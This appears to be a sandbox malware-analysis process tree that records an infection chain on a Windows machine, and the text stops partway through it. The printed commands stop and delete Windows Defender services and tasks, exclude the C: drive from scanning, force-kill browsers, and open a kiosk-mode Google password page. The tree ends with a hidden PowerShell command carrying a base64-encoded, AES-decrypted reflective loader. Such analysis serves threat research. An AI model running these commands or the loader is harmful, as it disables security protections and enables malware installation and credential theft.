        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:5500
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:4716
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:3500
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:4960
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:4428
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:4708
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:4556
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:1020
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4812
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:4636
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:2384
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        
        PID:5352
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:4868
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:4308
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:5976
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:3620
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        
        PID:4528
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:4064
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:1092
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:3864
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:2108
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:5436
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:1812
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:916
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:6040
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:2660
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:2068
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        
        PID:2496
      - C:\Users\Admin\AppData\Local\Temp\10413350101\772224823d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413350101\772224823d.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413350101\772224823d.exe"
        7⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3112
      - C:\Users\Admin\AppData\Local\Temp\10413360101\250ab1997b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413360101\250ab1997b.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4912
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413360101\250ab1997b.exe"
        7⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2884
      - C:\Users\Admin\AppData\Local\Temp\10413370101\bf63e36e97.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413370101\bf63e36e97.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5424
      - C:\Users\Admin\AppData\Local\Temp\10413380101\d8bc43181b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413380101\d8bc43181b.exe"
        6⤵
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Checks processor information in registry
        
        PID:748
        
        C:\Users\Admin\AppData\Local\Chel3raiO6Ri.exe
        
        "C:\Users\Admin\AppData\Local\Chel3raiO6Ri.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5444
        
        C:\Users\Admin\AppData\Local\1Uk2RJcLqabN.exe
        
        "C:\Users\Admin\AppData\Local\1Uk2RJcLqabN.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:1752
      - C:\Users\Admin\AppData\Local\Temp\10413390101\8726cdeb67.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413390101\8726cdeb67.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:6132
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:1000
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4768
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:3776
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:3968
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:4884
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:5668
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Drops desktop.ini file(s)
        Checks processor information in registry
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:5144
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2008 -prefsLen 27099 -prefMapHandle 2012 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {e3d24d73-c7f7-45ba-a576-d8f9c3317c30} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        9⤵
        
        PID:216
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {0f83d1d0-7175-4230-8876-dd31facdb6be} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        9⤵
        
        PID:4592
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3912 -prefsLen 25213 -prefMapHandle 3916 -prefMapSize 270279 -jsInitHandle 3920 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3928 -initialChannelId {4a641b97-5126-4db8-ad85-c45842c455af} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        9⤵
        Checks processor information in registry
        
        PID:3060
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4128 -prefsLen 27325 -prefMapHandle 4132 -prefMapSize 270279 -ipcHandle 4216 -initialChannelId {ce04f51f-bda9-4c4a-944f-780be32b1c2a} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        9⤵
        
        PID:4860
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3120 -prefsLen 34824 -prefMapHandle 3208 -prefMapSize 270279 -jsInitHandle 3112 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3184 -initialChannelId {79a513dd-786d-4a5f-a80a-6730bd503363} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        9⤵
        Checks processor information in registry
        
        PID:232
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5072 -prefsLen 35012 -prefMapHandle 5076 -prefMapSize 270279 -ipcHandle 5084 -initialChannelId {86f224fd-b16c-43c8-961c-c88df52f1ea5} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        9⤵
        Checks processor information in registry
        
        PID:6232
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5420 -prefsLen 32952 -prefMapHandle 5424 -prefMapSize 270279 -jsInitHandle 5428 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5432 -initialChannelId {a51d2570-f891-4619-86ff-95f01cd6d2ff} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        9⤵
        Checks processor information in registry
        
        PID:6548
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5604 -prefsLen 32952 -prefMapHandle 5608 -prefMapSize 270279 -jsInitHandle 5612 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5620 -initialChannelId {4d81eab3-7c5e-4a9c-a14e-da7ffbd484c2} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        9⤵
        Checks processor information in registry
        
        PID:6560
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5748 -prefsLen 32952 -prefMapHandle 5804 -prefMapSize 270279 -jsInitHandle 5808 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5816 -initialChannelId {68b1a432-72dd-4e4d-bef4-60de30937589} -parentPid 5144 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5144" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        9⤵
        Checks processor information in registry
        
        PID:6572
      - C:\Users\Admin\AppData\Local\Temp\10413400101\6089caffb3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413400101\6089caffb3.exe"
        6⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender TamperProtection settings
        Modifies Windows Defender notification settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:2844
      - C:\Users\Admin\AppData\Local\Temp\10413410101\YGYZCmt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413410101\YGYZCmt.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4572
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:100
      - C:\Users\Admin\AppData\Local\Temp\10413420101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413420101\Rm3cVPI.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4532
      - C:\Users\Admin\AppData\Local\Temp\10413430101\p3hx1_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413430101\p3hx1_003.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:5948
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:5576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5736
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:856
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        Sets service image path in registry
        Executes dropped EXE
        Suspicious behavior: LoadsDriver
        
        PID:6744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:12996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        9⤵
        
        PID:7628
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        Deletes itself
        Executes dropped EXE
        
        PID:6420
        
        C:\Users\Admin\AppData\Local\Temp\{5baf6fe9-5fe1-44d2-9bab-99a8355c991c}\5bb078af.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{5baf6fe9-5fe1-44d2-9bab-99a8355c991c}\5bb078af.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        
        PID:9172
        
        C:\Users\Admin\AppData\Local\Temp\{2493c9b9-3112-4cae-ac2e-d7f3c9491c8d}\e6ffa05b.exe
        
        C:/Users/Admin/AppData/Local/Temp/{2493c9b9-3112-4cae-ac2e-d7f3c9491c8d}/\e6ffa05b.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        10⤵
        
        PID:9672
      - C:\Users\Admin\AppData\Local\Temp\10413440101\qWR3lUj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413440101\qWR3lUj.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6188
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:6516
      - C:\Users\Admin\AppData\Local\Temp\10413450101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413450101\TbV75ZR.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2528
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        System Location Discovery: System Language Discovery
        
        PID:3500
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3500 -s 504
        8⤵
        Program crash
        
        PID:7404
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10413461121\5ym0ZYg.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:7504
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10413461121\5ym0ZYg.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:7552
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGc